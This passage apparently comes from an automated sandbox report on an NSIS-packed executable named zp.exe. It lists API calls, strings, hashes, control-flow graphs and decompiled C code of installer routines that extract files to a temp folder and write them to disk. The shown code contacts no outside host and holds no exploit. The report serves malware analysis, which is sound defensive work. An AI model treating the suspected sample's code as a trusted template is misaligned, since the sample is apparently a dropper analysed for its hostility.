                                                            0x00402e22
                                                            0x00000000
                                                            0x00000000
                                                            0x00402e2b
                                                            0x00402e2e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d07
                                                            0x00402d07
                                                            0x00402d0c
                                                            0x00402d10
                                                            0x00402d17
                                                            0x00402d1c
                                                            0x00402d1e
                                                            0x00402d20
                                                            0x00402d20
                                                            0x00402d28
                                                            0x00402d2d
                                                            0x00402d2f
                                                            0x00402e8e
                                                            0x00402ed0
                                                            0x00000000
                                                            0x00402ed0
                                                            0x00402d35
                                                            0x00402d3b
                                                            0x00402dbb
                                                            0x00402dbf
                                                            0x00402dc2
                                                            0x00402dc7
                                                            0x00000000
                                                            0x00402dbf
                                                            0x00402d48
                                                            0x00402d4d
                                                            0x00402d50
                                                            0x00402d55
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d57
                                                            0x00402d5e
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d60
                                                            0x00402d67
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d69
                                                            0x00402d70
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d72
                                                            0x00402d79
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d7b
                                                            0x00402d81
                                                            0x00402d8a
                                                            0x00402d90
                                                            0x00402d93
                                                            0x00402d95
                                                            0x00402d9b
                                                            0x00000000
                                                            0x00000000
                                                            0x00402da1
                                                            0x00402da5
                                                            0x00402dad
                                                            0x00402dad
                                                            0x00402db0
                                                            0x00402db3
                                                            0x00402db5
                                                            0x00402db7
                                                            0x00402db7
                                                            0x00000000
                                                            0x00402db5
                                                            0x00402da7
                                                            0x00402dab
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402dc8
                                                            0x00402dc8
                                                            0x00402dce
                                                            0x00402dde
                                                            0x00402dde
                                                            0x00402de1
                                                            0x00402de7
                                                            0x00402de9
                                                            0x00402de9
                                                            0x00000000
                                                            0x00402d07

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402C8D
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zp.exe,00000400), ref: 00402CA9
                                                              • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\zp.exe,80000000,00000003), ref: 00405973
                                                              • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zp.exe,C:\Users\user\Desktop\zp.exe,80000000,00000003), ref: 00402CF2
                                                            • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                                            Strings
                                                            • "C:\Users\user\Desktop\zp.exe", xrefs: 00402C79
                                                            • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                                            • Inst, xrefs: 00402D60
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                                            • C:\Users\user\Desktop\zp.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                                            • Error launching installer, xrefs: 00402CC9
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                                            • soft, xrefs: 00402D69
                                                            • Null, xrefs: 00402D72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\zp.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\zp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                            • API String ID: 2803837635-605005859
                                                            • Opcode ID: 0a233f6e3d580d779bc0ae37bc8a4ec036fbaf894395ff1e26bd82aff2214665
                                                            • Instruction ID: f333638810b0fcdd6804239d6ce5d4266c39632cb53516581565939923b004a1
                                                            • Opcode Fuzzy Hash: 0a233f6e3d580d779bc0ae37bc8a4ec036fbaf894395ff1e26bd82aff2214665
                                                            • Instruction Fuzzy Hash: BA61E271A40205ABDB21AF64DE89F9A76B8EB00315F20413BF504F72C1D7BC9D409B9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 540 40173f-401762 call 4029fd call 4057db 545 401764-40176a call 405cde 540->545 546 40176c-40177e call 405cde call 40576e lstrcatA 540->546 551 401783-401789 call 405f49 545->551 546->551 556 40178e-401792 551->556 557 401794-40179e call 405fe2 556->557 558 4017c5-4017c8 556->558 566 4017b0-4017c2 557->566 567 4017a0-4017ae CompareFileTime 557->567 559 4017d0-4017ec call 40596f 558->559 560 4017ca-4017cb call 40594a 558->560 568 401864-40188d call 404fc9 call 402f1f 559->568 569 4017ee-4017f1 559->569 560->559 566->558 567->566 581 401895-4018a1 SetFileTime 568->581 582 40188f-401893 568->582 570 4017f3-401835 call 405cde * 2 call 405d00 call 405cde call 4054f2 569->570 571 401846-401850 call 404fc9 569->571 570->556 603 40183b-40183c 570->603 583 401859-40185f 571->583 585 4018a7-4018b2 CloseHandle 581->585 582->581 582->585 586 40289b 583->586 588 402892-402895 585->588 589 4018b8-4018bb 585->589 591 40289d-4028a1 586->591 588->586 592 4018d0-4018d3 call 405d00 589->592 593 4018bd-4018ce call 405d00 lstrcatA 589->593 600 4018d8-40222b call 4054f2 592->600 593->600 600->591 603->583 605 40183e-40183f 603->605 605->571
                                                            C-Code - Quality: 77%
                                                            			E0040173F(FILETIME* __ebx, void* __eflags) {
                                                            				void* _t33;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				FILETIME* _t49;
                                                            				FILETIME* _t62;
                                                            				void* _t64;
                                                            				signed int _t70;
                                                            				FILETIME* _t71;
                                                            				FILETIME* _t75;
                                                            				signed int _t77;
                                                            				void* _t80;
                                                            				CHAR* _t82;
                                                            				CHAR* _t83;
                                                            				void* _t85;
                                                            
                                                            				_t75 = __ebx;
                                                            				_t82 = E004029FD(0x31);
                                                            				 *(_t85 - 8) = _t82;
                                                            				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                            				_t33 = E004057DB(_t82);
                                                            				_push(_t82);
                                                            				_t83 = "Call";
                                                            				if(_t33 == 0) {
                                                            					lstrcatA(E0040576E(E00405CDE(_t83, "C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses")), ??);
                                                            				} else {
                                                            					E00405CDE();
                                                            				}
                                                            				E00405F49(_t83);
                                                            				while(1) {
                                                            					__eflags =  *(_t85 + 8) - 3;
                                                            					if( *(_t85 + 8) >= 3) {
                                                            						_t64 = E00405FE2(_t83);
                                                            						_t77 = 0;
                                                            						__eflags = _t64 - _t75;
                                                            						if(_t64 != _t75) {
                                                            							_t71 = _t64 + 0x14;
                                                            							__eflags = _t71;
                                                            							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                            						__eflags = _t70;
                                                            						 *(_t85 + 8) = _t70;
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                            					if( *(_t85 + 8) == _t75) {
                                                            						E0040594A(_t83);
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - 1;
                                                            					_t41 = E0040596F(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                            					__eflags = _t41 - 0xffffffff;
                                                            					 *(_t85 - 0x34) = _t41;
                                                            					if(_t41 != 0xffffffff) {
                                                            						break;
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                            					if( *(_t85 + 8) != _t75) {
                                                            						E00404FC9(0xffffffe2,  *(_t85 - 8));
                                                            						__eflags =  *(_t85 + 8) - 2;
                                                            						if(__eflags == 0) {
                                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                            						}
                                                            						L31:
                                                            						 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t85 - 4));
                                                            						__eflags =  *0x423768;
                                                            						goto L32;
                                                            					} else {
                                                            						E00405CDE(0x409bb0, 0x424000);
                                                            						E00405CDE(0x424000, _t83);
                                                            						E00405D00(_t75, 0x409bb0, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsq8C22.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                            						E00405CDE(0x424000, 0x409bb0);
                                                            						_t62 = E004054F2("C:\Users\Arthur\AppData\Local\Temp\nsq8C22.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                            						__eflags = _t62;
                                                            						if(_t62 == 0) {
                                                            							continue;
                                                            						} else {
                                                            							__eflags = _t62 == 1;
                                                            							if(_t62 == 1) {
                                                            								 *0x423768 =  &( *0x423768->dwLowDateTime);
                                                            								L32:
                                                            								_t49 = 0;
                                                            								__eflags = 0;
                                                            							} else {
                                                            								_push(_t83);
                                                            								_push(0xfffffffa);
                                                            								E00404FC9();
                                                            								L29:
                                                            								_t49 = 0x7fffffff;
                                                            							}
                                                            						}
                                                            					}
                                                            					L33:
                                                            					return _t49;
                                                            				}
                                                            				E00404FC9(0xffffffea,  *(_t85 - 8)); // executed
                                                            				 *0x423794 =  *0x423794 + 1;
                                                            				_t43 = E00402F1F(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                                                            				 *0x423794 =  *0x423794 - 1;
                                                            				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                            				_t80 = _t43;
                                                            				if( *(_t85 - 0x18) != 0xffffffff) {
                                                            					L22:
                                                            					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                            				} else {
                                                            					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                            					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                            						goto L22;
                                                            					}
                                                            				}
                                                            				CloseHandle( *(_t85 - 0x34)); // executed
                                                            				__eflags = _t80 - _t75;
                                                            				if(_t80 >= _t75) {
                                                            					goto L31;
                                                            				} else {
                                                            					__eflags = _t80 - 0xfffffffe;
                                                            					if(_t80 != 0xfffffffe) {
                                                            						E00405D00(_t75, _t80, _t83, _t83, 0xffffffee);
                                                            					} else {
                                                            						E00405D00(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                            						lstrcatA(_t83,  *(_t85 - 8));
                                                            					}
                                                            					_push(0x200010);
                                                            					_push(_t83);
                                                            					E004054F2();
                                                            					goto L29;
                                                            				}
                                                            				goto L33;
                                                            			}

















                                                            0x0040173f
                                                            0x00401746
                                                            0x0040174f
                                                            0x00401752
                                                            0x00401755
                                                            0x0040175a
                                                            0x0040175b
                                                            0x00401762
                                                            0x0040177e
                                                            0x00401764
                                                            0x00401765
                                                            0x00401765
                                                            0x00401784
                                                            0x0040178e
                                                            0x0040178e
                                                            0x00401792
                                                            0x00401795
                                                            0x0040179a
                                                            0x0040179c
                                                            0x0040179e
                                                            0x004017a3
                                                            0x004017a3
                                                            0x004017ae
                                                            0x004017ae
                                                            0x004017bf
                                                            0x004017c1
                                                            0x004017c1
                                                            0x004017c2
                                                            0x004017c2
                                                            0x004017c5
                                                            0x004017c8
                                                            0x004017cb
                                                            0x004017cb
                                                            0x004017d2
                                                            0x004017e1
                                                            0x004017e6
                                                            0x004017e9
                                                            0x004017ec
                                                            0x00000000
                                                            0x00000000
                                                            0x004017ee
                                                            0x004017f1
                                                            0x0040184b
                                                            0x00401850
                                                            0x004015a8
                                                            0x00402663
                                                            0x00402663
                                                            0x00402892
                                                            0x00402895
                                                            0x00402895
                                                            0x00000000
                                                            0x004017f3
                                                            0x004017f9
                                                            0x00401804
                                                            0x00401811
                                                            0x0040181c
                                                            0x00401832
                                                            0x00401832
                                                            0x00401835
                                                            0x00000000
                                                            0x0040183b
                                                            0x0040183b
                                                            0x0040183c
                                                            0x00401859
                                                            0x0040289b
                                                            0x0040289b
                                                            0x0040289b
                                                            0x0040183e
                                                            0x0040183e
                                                            0x0040183f
                                                            0x00401492
                                                            0x00402226
                                                            0x00402226
                                                            0x00402226
                                                            0x0040183c
                                                            0x00401835
                                                            0x0040289d
                                                            0x004028a1
                                                            0x004028a1
                                                            0x00401869
                                                            0x0040186e
                                                            0x0040187c
                                                            0x00401881
                                                            0x00401887
                                                            0x0040188b
                                                            0x0040188d
                                                            0x00401895
                                                            0x004018a1
                                                            0x0040188f
                                                            0x0040188f
                                                            0x00401893
                                                            0x00000000
                                                            0x00000000
                                                            0x00401893
                                                            0x004018aa
                                                            0x004018b0
                                                            0x004018b2
                                                            0x00000000
                                                            0x004018b8
                                                            0x004018b8
                                                            0x004018bb
                                                            0x004018d3
                                                            0x004018bd
                                                            0x004018c0
                                                            0x004018c9
                                                            0x004018c9
                                                            0x004018d8
                                                            0x004018dd
                                                            0x00402221
                                                            0x00000000
                                                            0x00402221
                                                            0x00000000

                                                            APIs
                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses,00000000,00000000,00000031), ref: 0040177E
                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses,00000000,00000000,00000031), ref: 004017A8
                                                              • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Bogtilrettelgnings82 Setup,NSIS Error), ref: 00405CEB
                                                              • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                              • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                              • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000), ref: 00405025
                                                              • Part of subcall function 00404FC9: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll), ref: 00405037
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp$C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll$C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses$Call
                                                            • API String ID: 1941528284-2477442322
                                                            • Opcode ID: 8f4d0c5f3dcbfcb15197cf1fb966cb8d0149284c43733f6f1e94ac9440d3b273
                                                            • Instruction ID: 7db23f1b7129aac0a780206d539a17182f36eced295e71d03ce013e672f77a8a
                                                            • Opcode Fuzzy Hash: 8f4d0c5f3dcbfcb15197cf1fb966cb8d0149284c43733f6f1e94ac9440d3b273
                                                            • Instruction Fuzzy Hash: 3241E471904615BADB10BBA9DD46EAF3679EF01328F30823BF111F20E1D67C8A419A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 607 404fc9-404fde 608 405094-405098 607->608 609 404fe4-404ff6 607->609 610 405001-40500d lstrlenA 609->610 611 404ff8-404ffc call 405d00 609->611 613 40502a-40502e 610->613 614 40500f-40501f lstrlenA 610->614 611->610 616 405030-405037 SetWindowTextA 613->616 617 40503d-405041 613->617 614->608 615 405021-405025 lstrcatA 614->615 615->613 616->617 618 405043-405085 SendMessageA * 3 617->618 619 405087-405089 617->619 618->619 619->608 620 40508b-40508e 619->620 620->608
                                                            C-Code - Quality: 100%
                                                            			E00404FC9(CHAR* _a4, CHAR* _a8) {
                                                            				struct HWND__* _v8;
                                                            				signed int _v12;
                                                            				CHAR* _v32;
                                                            				long _v44;
                                                            				int _v48;
                                                            				void* _v52;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				CHAR* _t26;
                                                            				signed int _t27;
                                                            				CHAR* _t28;
                                                            				long _t29;
                                                            				signed int _t39;
                                                            
                                                            				_t26 =  *0x422ec4; // 0x103d0
                                                            				_v8 = _t26;
                                                            				if(_t26 != 0) {
                                                            					_t27 =  *0x423794;
                                                            					_v12 = _t27;
                                                            					_t39 = _t27 & 0x00000001;
                                                            					if(_t39 == 0) {
                                                            						E00405D00(0, _t39, 0x41f4c0, 0x41f4c0, _a4);
                                                            					}
                                                            					_t26 = lstrlenA(0x41f4c0);
                                                            					_a4 = _t26;
                                                            					if(_a8 == 0) {
                                                            						L6:
                                                            						if((_v12 & 0x00000004) == 0) {
                                                            							_t26 = SetWindowTextA( *0x422ea8, 0x41f4c0); // executed
                                                            						}
                                                            						if((_v12 & 0x00000002) == 0) {
                                                            							_v32 = 0x41f4c0;
                                                            							_v52 = 1;
                                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                            							_v44 = 0;
                                                            							_v48 = _t29 - _t39;
                                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                            						}
                                                            						if(_t39 != 0) {
                                                            							_t28 = _a4;
                                                            							 *((char*)(_t28 + 0x41f4c0)) = 0;
                                                            							return _t28;
                                                            						}
                                                            					} else {
                                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                            						if(_t26 < 0x800) {
                                                            							_t26 = lstrcatA(0x41f4c0, _a8);
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t26;
                                                            			}

















                                                            0x00404fcf
                                                            0x00404fdb
                                                            0x00404fde
                                                            0x00404fe4
                                                            0x00404ff0
                                                            0x00404ff3
                                                            0x00404ff6
                                                            0x00404ffc
                                                            0x00404ffc
                                                            0x00405002
                                                            0x0040500a
                                                            0x0040500d
                                                            0x0040502a
                                                            0x0040502e
                                                            0x00405037
                                                            0x00405037
                                                            0x00405041
                                                            0x0040504a
                                                            0x00405056
                                                            0x0040505d
                                                            0x00405061
                                                            0x00405064
                                                            0x00405077
                                                            0x00405085
                                                            0x00405085
                                                            0x00405089
                                                            0x0040508b
                                                            0x0040508e
                                                            0x00000000
                                                            0x0040508e
                                                            0x0040500f
                                                            0x00405017
                                                            0x0040501f
                                                            0x00405025
                                                            0x00000000
                                                            0x00405025
                                                            0x0040501f
                                                            0x0040500d
                                                            0x00405098

                                                            APIs
                                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                            • lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000), ref: 00405025
                                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll), ref: 00405037
                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll
                                                            • API String ID: 2531174081-1801908762
                                                            • Opcode ID: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                            • Instruction ID: e00d580e889cbc391bca3c98a7377c16a9d81c786260b2fa8fb0dbec0f6b8e5c
                                                            • Opcode Fuzzy Hash: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                            • Instruction Fuzzy Hash: 9F218C71900508BADF119FA9CD84ADFBFA9FF04354F14807AF948A6290C3798E419FA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 621 40303a-403063 GetTickCount 622 4031a4-4031ac call 402bda 621->622 623 403069-403094 call 4031cc SetFilePointer 621->623 628 4031ae-4031b3 622->628 629 403099-4030ab 623->629 630 4030ad 629->630 631 4030af-4030bd call 4031b6 629->631 630->631 634 4030c3-4030cf 631->634 635 403196-403199 631->635 636 4030d5-4030db 634->636 635->628 637 403106-403122 call 406109 636->637 638 4030dd-4030e3 636->638 644 403124-40312c 637->644 645 40319f 637->645 638->637 639 4030e5-403105 call 402bda 638->639 639->637 647 403160-403166 644->647 648 40312e-403144 WriteFile 644->648 646 4031a1-4031a2 645->646 646->628 647->645 651 403168-40316a 647->651 649 403146-40314a 648->649 650 40319b-40319d 648->650 649->650 652 40314c-403158 649->652 650->646 651->645 653 40316c-40317f 651->653 652->636 654 40315e 652->654 653->629 655 403185-403194 SetFilePointer 653->655 654->653 655->622
                                                            C-Code - Quality: 94%
                                                            			E0040303A(intOrPtr _a4) {
                                                            				long _v4;
                                                            				void* __ecx;
                                                            				intOrPtr _t12;
                                                            				intOrPtr _t13;
                                                            				signed int _t14;
                                                            				void* _t16;
                                                            				void* _t17;
                                                            				long _t18;
                                                            				int _t21;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t34;
                                                            				long _t35;
                                                            				intOrPtr _t37;
                                                            				void* _t39;
                                                            				long _t40;
                                                            				intOrPtr _t53;
                                                            
                                                            				_t35 =  *0x41688c; // 0x44ff
                                                            				_t37 = _t35 -  *0x40a7f8 + _a4;
                                                            				 *0x4236ec = GetTickCount() + 0x1f4;
                                                            				if(_t37 <= 0) {
                                                            					L23:
                                                            					E00402BDA(1);
                                                            					return 0;
                                                            				}
                                                            				E004031CC( *0x41e89c);
                                                            				SetFilePointer( *0x40901c,  *0x40a7f8, 0, 0); // executed
                                                            				 *0x41e898 = _t37;
                                                            				 *0x416888 = 0;
                                                            				while(1) {
                                                            					_t12 =  *0x416890; // 0x82d61
                                                            					_t34 = 0x4000;
                                                            					_t13 = _t12 -  *0x41e89c;
                                                            					if(_t13 <= 0x4000) {
                                                            						_t34 = _t13;
                                                            					}
                                                            					_t14 = E004031B6(0x412888, _t34);
                                                            					if(_t14 == 0) {
                                                            						break;
                                                            					}
                                                            					 *0x41e89c =  *0x41e89c + _t34;
                                                            					 *0x40a818 = 0x412888;
                                                            					 *0x40a81c = _t34;
                                                            					L6:
                                                            					L6:
                                                            					if( *0x4236f0 != 0 &&  *0x423780 == 0) {
                                                            						_t22 =  *0x41e898; // 0x1be16
                                                            						 *0x416888 = _t22 -  *0x41688c - _a4 +  *0x40a7f8;
                                                            						E00402BDA(0);
                                                            					}
                                                            					 *0x40a820 = 0x40a888;
                                                            					 *0x40a824 = 0x8000; // executed
                                                            					_t16 = E00406109(0x40a800); // executed
                                                            					if(_t16 < 0) {
                                                            						goto L21;
                                                            					}
                                                            					_t39 =  *0x40a820; // 0x4101b9
                                                            					_t40 = _t39 - 0x40a888;
                                                            					if(_t40 == 0) {
                                                            						__eflags =  *0x40a81c; // 0x0
                                                            						if(__eflags != 0) {
                                                            							goto L21;
                                                            						}
                                                            						__eflags = _t34;
                                                            						if(_t34 == 0) {
                                                            							goto L21;
                                                            						}
                                                            						L17:
                                                            						_t18 =  *0x41688c; // 0x44ff
                                                            						if(_t18 -  *0x40a7f8 + _a4 > 0) {
                                                            							continue;
                                                            						}
                                                            						SetFilePointer( *0x40901c, _t18, 0, 0); // executed
                                                            						goto L23;
                                                            					}
                                                            					_t21 = WriteFile( *0x40901c, 0x40a888, _t40,  &_v4, 0); // executed
                                                            					if(_t21 == 0 || _t40 != _v4) {
                                                            						_push(0xfffffffe);
                                                            						L22:
                                                            						_pop(_t17);
                                                            						return _t17;
                                                            					} else {
                                                            						 *0x40a7f8 =  *0x40a7f8 + _t40;
                                                            						_t53 =  *0x40a81c; // 0x0
                                                            						if(_t53 != 0) {
                                                            							goto L6;
                                                            						}
                                                            						goto L17;
                                                            					}
                                                            					L21:
                                                            					_push(0xfffffffd);
                                                            					goto L22;
                                                            				}
                                                            				return _t14 | 0xffffffff;
                                                            			}



















                                                            0x0040303e
                                                            0x0040304b
                                                            0x0040305e
                                                            0x00403063
                                                            0x004031a4
                                                            0x004031a6
                                                            0x00000000
                                                            0x004031ac
                                                            0x0040306f
                                                            0x00403082
                                                            0x00403088
                                                            0x0040308e
                                                            0x00403099
                                                            0x00403099
                                                            0x0040309e
                                                            0x004030a3
                                                            0x004030ab
                                                            0x004030ad
                                                            0x004030ad
                                                            0x004030b6
                                                            0x004030bd
                                                            0x00000000
                                                            0x00000000
                                                            0x004030c3
                                                            0x004030c9
                                                            0x004030cf
